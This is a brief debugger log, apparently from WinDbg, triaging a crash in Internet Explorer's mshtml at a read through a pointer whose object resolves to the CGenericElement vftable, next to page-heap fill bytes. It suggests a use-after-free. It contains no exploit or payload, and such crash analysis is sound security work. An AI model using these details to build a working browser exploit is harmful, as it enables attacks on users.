6a2fe563 8b4a40 mov ecx,dword ptr [edx+40h] ds::07337ff0=
:> dd edx
07337fb0 06e4efc8 ffff0075 ffffffff
07337fc0
07337fd0 07337fd8
07337fe0 07337fc0 06ab8fd8
07337ff0 d0d0d0d0
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
:> dd 06e4efc8
06e4efc8 6a11c2e8 0738cfe8
06e4efd8 062c5ef0 07337fb0
06e4efe8 075c2f30 06e96ff4
06e4eff8 ???????? ????????
06e4f008 ???????? ???????? ???????? ????????
06e4f018 ???????? ???????? ???????? ????????
06e4f028 ???????? ???????? ???????? ????????
06e4f038 ???????? ???????? ???????? ????????
:> ln 6a11c2e8
(6a11c2e8) mshtml!CGenericElement::`vftable' | (6a254ce0) mshtml!CHeaderElement::`vftable'
Exact matches:
mshtml!CGenericElement::`vftable' = <no type information>
05-11 20:24